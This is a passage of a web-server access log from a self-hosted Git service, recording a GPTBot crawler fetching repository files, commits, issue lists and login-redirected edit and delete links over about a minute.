"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/OpcTest%20program%20by%20claude.md" [Client 74.7.227.38] [Length 15907] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook" -[17/Feb/2026:17:27:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:27:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=all&type=all" -[17/Feb/2026:17:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33391] [Gzip 10.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:17:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11131] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:17:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 10657] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:17:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11915] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:27:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild" [Client 74.7.227.38] [Length 238978] [Gzip 16.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build" -[17/Feb/2026:17:27:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fmain" [Client 74.7.227.38] [Length 24150] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main" -[17/Feb/2026:17:27:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:27:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tags" [Client 74.7.227.38] [Length 7732] [Gzip 2.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" -[17/Feb/2026:17:27:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/.Notebook/OpcTest%20program%20by%20claude.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/OpcTest%20program%20by%20claude.md" -[17/Feb/2026:17:27:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/.Notebook/OpcTest%20program%20by%20claude.md" -[17/Feb/2026:17:27:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/.Notebook/OpcTest%20program%20by%20claude.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/OpcTest%20program%20by%20claude.md" -[17/Feb/2026:17:27:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/.Notebook/OpcTest%20program%20by%20claude.md" -[17/Feb/2026:17:27:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10164] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:17:27:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/.Notebook/OpcTest%20program%20by%20claude.md" [Client 74.7.227.38] [Length 24705] [Gzip 15.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/OpcTest%20program%20by%20claude.md" -[17/Feb/2026:17:27:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 13073] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-next-todo.md" -[17/Feb/2026:17:27:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:17:27:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:17:27:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:17:27:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:17:28:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:17:28:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:17:28:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 11204] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:17:28:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 9868] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:17:28:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11914] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:28:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11914] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:28:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11917] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:28:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 10270] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:17:28:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/.Notebook/OpcTest%20program%20by%20claude.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/.Notebook/OpcTest%20program%20by%20claude.md" -[17/Feb/2026:17:28:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/.Notebook/OpcTest%20program%20by%20claude.md" -[17/Feb/2026:17:28:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/controller-next-todo.md" -[17/Feb/2026:17:28:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/controller-next-todo.md" -[17/Feb/2026:17:28:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/controller-next-todo.md" -[17/Feb/2026:17:28:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/controller-next-todo.md" -[17/Feb/2026:17:28:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/.Notebook/OpcTest%20program%20by%20claude.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/.Notebook/OpcTest%20program%20by%20claude.md" -[17/Feb/2026:17:28:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/.Notebook/OpcTest%20program%20by%20claude.md" -[17/Feb/2026:17:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10313] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:17:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:17:28:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1069] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:17:28:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9882] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:17:28:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:17:28:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:17:28:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:17:28:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:17:28:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 33373] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:17:28:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:17:28:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/ui_main.py" [Client 74.7.227.38] [Length 29965] [Gzip 8.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" -[17/Feb/2026:17:28:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:28:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:28:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33666] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:17:28:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:17:28:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10150] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:28:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:17:28:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:28:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, 